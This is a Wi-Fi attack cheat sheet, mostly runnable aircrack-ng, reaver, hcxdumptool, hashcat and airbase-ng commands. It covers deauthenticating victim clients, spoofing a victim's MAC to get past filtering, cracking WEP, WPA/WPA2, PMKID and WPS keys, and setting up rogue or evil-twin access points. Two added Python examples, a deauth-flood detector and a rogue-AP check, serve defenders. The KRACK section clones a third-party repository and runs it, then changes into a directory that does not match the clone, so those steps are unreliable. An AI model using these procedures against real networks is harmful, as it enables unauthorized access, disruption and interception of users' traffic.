Monitoring
Set a wireless network interface to the monitoring mode:
airmon-ng start wlan0
ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up
Set a wireless network interface to the monitoring mode on a specified channel:
airmon-ng start wlan0 8
iwconfig wlan0 channel 8
[Optional] Kill services that might interfere with wireless network interfaces in the monitoring mode:
Set a wireless network interface back to the managed mode:
airmon-ng stop wlan0mon
ifconfig wlan0 down && iwconfig wlan0 mode managed && ifconfig wlan0 up
Search for WiFi networks within your range:
airodump-ng --wps -w airodump_sweep_results wlan0mon
wash -a -i wlan0mon
[Optional] Install reaver/wash on WiFi Pineapple Mark VII:
opkg update && opkg install libpcap reaver
[Optional] Install reaver/wash on WiFi Pineapple Nano:
opkg update && opkg install libpcap && opkg -d sd install wash
Monitor a WiFi network to capture handshakes/requests:
airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid FF:FF:FF:FF:FF:FF
If you specified an output file, don't forget to stop airodump-ng once you are done monitoring; otherwise it will keep writing and fill up your free storage with a large PCAP file.
Use Kismet or WiFi Pineapple to find more information about wireless access points, e.g. their MAC address, vendor's name, etc.
Find Hidden SSIDs
airmon-ng start wlan0
airodump-ng -c <Channel> --bssid <BSSID> wlan0mon
aireplay-ng -0 20 -a <BSSID> -c <VictimMac> wlan0mon
Bypass MAC Filtering
airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
ifconfig wlan0mon down
macchanger --mac <VictimMac> wlan0mon
ifconfig wlan0mon up
aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon
Cracking
Check if a wireless interface supports packet injection:
aireplay-ng --test wlan1 -e essid -a FF:FF:FF:FF:FF:FF
WPA/WPA2 Handshake
Monitor a WiFi network to capture a WPA/WPA2 4-way handshake:
airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid FF:FF:FF:FF:FF:FF
[Optional] Deauthenticate clients from a WiFi network:
aireplay-ng --deauth 10 wlan1 -e essid -a FF:FF:FF:FF:FF:FF
Start the dictionary attack against a WPA/WPA2 handshake:
aircrack-ng -e essid -b FF:FF:FF:FF:FF:FF -w rockyou.txt airodump_essid_results*.cap
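The deauthentication step above is also the loudest thing in this whole procedure on the air, which makes it the natural detection point for a wireless IDS. The following is an added example written for the defender side, not code from the original cheat sheet: a small Python detector that parses bare 802.11 frames (radiotap header already stripped, as a monitor-mode capture library would deliver them), keeps a sliding one-second window per BSSID, and raises an alert when the count of deauthentication/disassociation frames crosses a threshold. Every MAC address, timestamp and frame in the sample capture is constructed test data; the window and threshold values are assumptions to tune per site.

```python
"""Deauthentication flood detector for bare 802.11 frames (added example).

Input: (timestamp_seconds, raw_frame_bytes) pairs, as a monitor-mode capture
delivers them once the radiotap header has been stripped. All MAC addresses
and the sample capture below are constructed test data.
"""
import struct
from collections import defaultdict

MGMT = 0               # frame type 0 = management
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_frame(raw):
    """Decode the 24-byte MAC header and, for deauth/disassoc, the 2-byte reason
    code that follows it. Returns None if the frame is too short for a header."""
    if len(raw) < 24:
        return None
    fc0 = raw[0]                       # frame control, first byte: version|type|subtype
    frame = {
        "type": (fc0 >> 2) & 0x3,
        "subtype": (fc0 >> 4) & 0xF,
        "dst": mac_str(raw[4:10]),     # addr1: receiver
        "src": mac_str(raw[10:16]),    # addr2: transmitter
        "bssid": mac_str(raw[16:22]),  # addr3: BSSID for STA<->AP management frames
        "reason": None,
    }
    if (frame["type"] == MGMT
            and frame["subtype"] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC)
            and len(raw) >= 26):
        frame["reason"] = struct.unpack_from("<H", raw, 24)[0]
    return frame


def detect_deauth_flood(frames, window=1.0, threshold=10):
    """Return one alert per BSSID that sees at least `threshold` deauth/disassoc
    frames inside any `window`-second span (sliding window per BSSID)."""
    per_bssid = defaultdict(list)
    for ts, raw in frames:
        f = parse_frame(raw)
        if f is None or f["type"] != MGMT or f["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        per_bssid[f["bssid"]].append((ts, f))

    alerts = []
    for bssid, events in per_bssid.items():
        events.sort(key=lambda e: e[0])
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                span = [f for _, f in events[start:end + 1]]
                alerts.append({
                    "bssid": bssid,
                    "count": len(span),
                    "first_ts": events[start][0],
                    "broadcast": any(f["dst"] == BROADCAST for f in span),    # every client kicked at once
                    "from_ap_address": any(f["src"] == bssid for f in span),  # frames name the AP as sender
                    "reasons": sorted({f["reason"] for f in span}),
                })
                break   # one alert per BSSID is enough
    return alerts


def make_deauth(dst, src, bssid, reason=7, seq=0):
    """Constructed test fixture: bare deauthentication frame (type 0, subtype 12).
    Reason 7 (class 3 frame from a non-associated STA) is a common code in floods."""
    header = (bytes([0xC0, 0x00]) + struct.pack("<H", 0x013A)
              + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
              + struct.pack("<H", seq << 4))
    return header + struct.pack("<H", reason)


def make_beacon(bssid, seq=0):
    """Constructed test fixture: beacon header (type 0, subtype 8) with a dummy body,
    present only to show that other management frames are ignored."""
    return (bytes([0x80, 0x00]) + struct.pack("<H", 0)
            + mac_bytes(BROADCAST) + mac_bytes(bssid) + mac_bytes(bssid)
            + struct.pack("<H", seq << 4) + bytes(12))


def sample_capture():
    """Constructed capture: background beacons, a 12-frame broadcast deauth burst
    that names `ap` as sender, and one isolated deauth from a second AP."""
    ap, other_ap, client = "aa:bb:cc:dd:ee:ff", "11:22:33:44:55:66", "de:ad:be:ef:00:01"
    frames = [(i * 0.5, make_beacon(ap, seq=i)) for i in range(4)]
    frames += [(1.0 + i * 0.05, make_deauth(BROADCAST, ap, ap, reason=7, seq=i)) for i in range(12)]
    frames.append((7.0, make_deauth(client, other_ap, other_ap, reason=3, seq=1)))
    return frames


if __name__ == "__main__":
    for alert in detect_deauth_flood(sample_capture()):
        print(alert)
```

On the constructed capture only the 12-frame burst trips the detector (the single deauth from the second AP is ordinary roaming noise); the `broadcast` and `from_ap_address` fields tell an analyst that the frames claim the AP as sender and target every client at once, which is exactly the shape a handshake-capture deauth produces. Management Frame Protection (802.11w) on the AP makes these spoofed frames fail integrity checks in the first place, so the detector is a complement to that control, not a substitute.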
PMKID Attack
Crack the WPA/WPA2 authentication without deauthenticating clients.
Install the required set of tools on Kali Linux:
apt-get update && apt-get -y install hcxtools
[Optional] Install the required tool on WiFi Pineapple Mark VII:
opkg update && opkg install hcxdumptool
[Optional] Install the required tool on WiFi Pineapple Nano:
opkg update && opkg -d sd install hcxdumptool
Start capturing PMKID hashes for all nearby networks:
hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0mon
[Optional] Start capturing PMKID hashes for specified WiFi networks:
echo HH:HH:HH:HH:HH:HH | sed 's/\://g' >> filter.txt
hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0mon --filterlist_ap=filter.txt --filtermode=2
Sometimes it can take hours to capture a single PMKID hash.
Extract PMKID hashes from a PCAP file:
hcxpcaptool hcxdumptool_results.cap -k hashes.txt
Start the dictionary attack against PMKID hashes:
hashcat -m 16800 -a 0 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt rockyou.txt
Find out more about Hashcat in my other project.
WEP Attacks
Fake Authentication Attack
airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
# What's my MAC?
macchanger --show wlan0mon
aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <BSSID> -h <OurMac> wlan0mon
aircrack-ng -b <BSSID> <PCAP_of_FileName>
ARP Replay Attack
airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
# What's my MAC?
macchanger --show wlan0mon
aireplay-ng -3 -x 1000 -n 1000 -b <BSSID> -h <OurMac> wlan0mon
aircrack-ng -b <BSSID> <PCAP_of_FileName>
Chop Chop Attack
airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
# What's my MAC?
macchanger --show wlan0mon
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
aireplay-ng -4 -b <BSSID> -h <OurMac> wlan0mon
# Press 'y' when prompted
packetforge-ng -0 -a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
aireplay-ng -2 -r <FileName2> wlan0mon
aircrack-ng <PCAP_of_FileName>
Fragmentation Attack
airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
# What's my MAC?
macchanger --show wlan0mon
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
aireplay-ng -5 -b <BSSID> -h <OurMac> wlan0mon
# Press 'y' when prompted
packetforge-ng -0 -a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
aireplay-ng -2 -r <FileName2> wlan0mon
aircrack-ng <PCAP_of_FileName>
SKA (Shared Key Authentication) Type Cracking
airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
ifconfig wlan0mon down
macchanger --mac <VictimMac> wlan0mon
ifconfig wlan0mon up
aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon
aireplay-ng --deauth 1 -a <BSSID> -h <FakedMac> wlan0mon
aircrack-ng <PCAP_of_FileName>
WPA / WPA2 Attacks
WPS Attack
airmon-ng start wlan0
apt-get install reaver
wash -i wlan0mon -C
reaver -i wlan0mon -b <BSSID> -vv -S
# or, target a specific PIN
reaver -i wlan0mon -c <Channel> -b <BSSID> -p <PinCode> -vv -S
# Crack a WPS PIN:
reaver -vv --pixie-dust -i wlan1 -c 8 -e essid -b FF:FF:FF:FF:FF:FF
# Crack a WPS PIN with some delay between attempts:
reaver -vv --pixie-dust -N -L -d 5 -r 3:15 -T 0.5 -i wlan1 -c 8 -e essid -b FF:FF:FF:FF:FF:FF
KRACK Attack
apt-get update && apt-get install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils python-scapy python-pycryptodome
git clone https://github.com/NoahhhRyan/krackattacks-test.git
cd krackattacks-test-research
cd krackattacks
chmod +x krack-ft-test.py
chmod +x disable-hwcrypto.sh
./disable-hwcrypto.sh
python krack-ft-test.py
# Edit network.conf in the suite directory: replace "testnet" with the
# name of the WiFi network you want to test; the password is arbitrary.
sudo wpa_supplicant -D nl80211 -i wlan0 -c network.conf
Enterprise Attacks
Dictionary Attack
airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
aircrack-ng -w <WordlistFile> -b <BSSID> <Handshaked_PCAP>
Crack with Hashcat
airmon-ng
airmon-ng start wlx000f00313c95
airodump-ng wlan1mon -c 11
airodump-ng wlan1mon -c 11 --bssid 48:EE:0C:8E:D0:5C -w /root/hp/
aireplay-ng -0 0 -a 48:EE:0C:8E:D0:5C wlan1mon
# convert pcap to hccapx, e.g. with the online converter:
# https://hashcat.net/cap2hccapx/
apt install hashcat-utils
crunch 8 8 1234567890 | hashcat -m 22000 18081_1596091404.hccapx --status -o cracked.txt
Crack with John The Ripper
airmon-ng start wlan0
airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
cd /pentest/passwords/john
john --wordlist=<Wordlist> --rules --stdout | aircrack-ng -0 -e <ESSID> -w - <PCAP_of_FileName>
Crack with coWPAtty
airmon-ng start wlan0
airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
cowpatty -r <FileName> -f <Wordlist> -2 -s <SSID>
genpmk -s <SSID> -f <Wordlist> -d <HashesFileName>
cowpatty -r <PCAP_of_FileName> -d <HashesFileName> -2 -s <SSID>
Crack with Pyrit
airmon-ng start wlan0
airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
pyrit -r <PCAP_of_FileName> -b <BSSID> -i <Wordlist> attack_passthrough
pyrit -i <Wordlist> import_passwords
pyrit -e <ESSID> create_essid
pyrit batch
pyrit -r <PCAP_of_FileName> attack_db
Precomputed WPA Keys Database Attack
airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
kwrite ESSID.txt
airolib-ng NEW_DB --import essid ESSID.txt
airolib-ng NEW_DB --import passwd <DictionaryFile>
airolib-ng NEW_DB --clean all
airolib-ng NEW_DB --stats
airolib-ng NEW_DB --batch
airolib-ng NEW_DB --verify all
aircrack-ng -r NEW_DB <Handshaked_PCAP>
WPA3 Attacks
DragonBlood Attack
Rogue AP
airmon-ng start wlan0
airbase-ng -e "<FakeESSID>" wlan0mon
brctl addbr <VariableName>
brctl addif <VariableName> wlan0mon
brctl addif <VariableName> at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig <VariableName> up
aireplay-ng --deauth 0 -a <victimBSSID> wlan0mon
dhclient3 <VariableName> &
wireshark &
# select the <VariableName> interface in Wireshark
Evil Twin
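From the defender's side, a rogue AP or evil twin of the kind airbase-ng sets up shows itself as an unknown BSSID advertising one of your own ESSIDs, often open or with weaker encryption than the real network. The following is an added example, not code from the original cheat sheet: it reads the access-point section of the CSV that `airodump-ng -w <prefix>` writes next to its PCAP (the same sweep shown in the Monitoring section) and compares every AP that uses a managed ESSID against an allowlist of authorized BSSIDs. The CSV rows, MAC addresses and allowlist are constructed sample data in the airodump-ng column layout; the column handling assumes that layout.

```python
"""Rogue / evil-twin AP check over an airodump-ng CSV export (added example).

Reads the access-point section of the CSV that `airodump-ng -w <prefix>` writes
(<prefix>-01.csv), then compares every AP advertising one of our managed
ESSIDs against an allowlist of authorized BSSIDs. The CSV below is constructed
sample data in the airodump-ng column layout; the allowlist is an assumption.
"""
import csv

# Constructed sample in the airodump-ng CSV layout: AP section, blank line, station section.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2024-01-01 09:00:00, 2024-01-01 09:05:00,  6, 130, WPA2, CCMP, PSK, -45, 300, 0,   0.  0.  0.  0,  9, corp-wifi,
AA:BB:CC:DD:EE:02, 2024-01-01 09:00:00, 2024-01-01 09:05:00, 11, 130, WPA2, CCMP, PSK, -60, 280, 0,   0.  0.  0.  0,  9, corp-wifi,
02:00:00:00:00:01, 2024-01-01 09:02:10, 2024-01-01 09:05:00,  6,  54, OPN,     ,    , -38, 120, 0,   0.  0.  0.  0,  9, corp-wifi,
C0:FF:EE:00:00:01, 2024-01-01 09:00:00, 2024-01-01 09:05:00,  1,  65, WPA2, CCMP, PSK, -80,  90, 0,   0.  0.  0.  0,  8, neighbor,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
DE:AD:BE:EF:00:01, 2024-01-01 09:01:00, 2024-01-01 09:05:00, -50, 40, AA:BB:CC:DD:EE:01, corp-wifi
"""

# Assumed allowlist: ESSID -> (authorized BSSIDs, expected start of the Privacy column)
MANAGED_NETWORKS = {
    "corp-wifi": ({"AA:BB:CC:DD:EE:01", "AA:BB:CC:DD:EE:02"}, "WPA2"),
}


def parse_airodump_csv(text):
    """Return the AP rows as dicts keyed by the header names. The AP section ends
    at the first blank line after the header; the station section is ignored."""
    block = []
    for line in text.splitlines():
        if not line.strip():
            if block:
                break      # blank line after the AP rows: station section begins
            continue       # leading blank line(s)
        block.append(line)
    reader = csv.reader(block, skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    rows = []
    for fields in reader:
        if len(fields) < len(header):
            continue       # truncated line (airodump-ng may still be writing)
        rows.append({h: v.strip() for h, v in zip(header, fields)})
    return rows


def find_rogue_aps(rows, managed=MANAGED_NETWORKS):
    """Flag APs that advertise a managed ESSID from an unauthorized BSSID (evil
    twin candidate) or from an authorized BSSID with unexpected security settings."""
    alerts = []
    for ap in rows:
        essid = ap["ESSID"]
        if essid not in managed:
            continue
        authorized, expected_privacy = managed[essid]
        bssid = ap["BSSID"].upper()
        if bssid not in authorized:
            kind = "unknown-bssid"
        elif not ap["Privacy"].startswith(expected_privacy):
            kind = "privacy-mismatch"
        else:
            continue
        alerts.append({
            "kind": kind,
            "essid": essid,
            "bssid": bssid,
            "channel": ap["channel"],
            "privacy": ap["Privacy"] or "OPN",
            "power": ap["Power"],
        })
    return alerts


if __name__ == "__main__":
    for alert in find_rogue_aps(parse_airodump_csv(SAMPLE_CSV)):
        print(alert)
```

On the sample data the open AP `02:00:00:00:00:01` beaconing `corp-wifi` on channel 6 is the only alert; the neighbour's network is ignored because its ESSID is not managed. Run against a scheduled sweep, the same check gives a cheap rogue-AP inventory; the allowlist should come from the WLAN controller rather than being hard-coded as it is here.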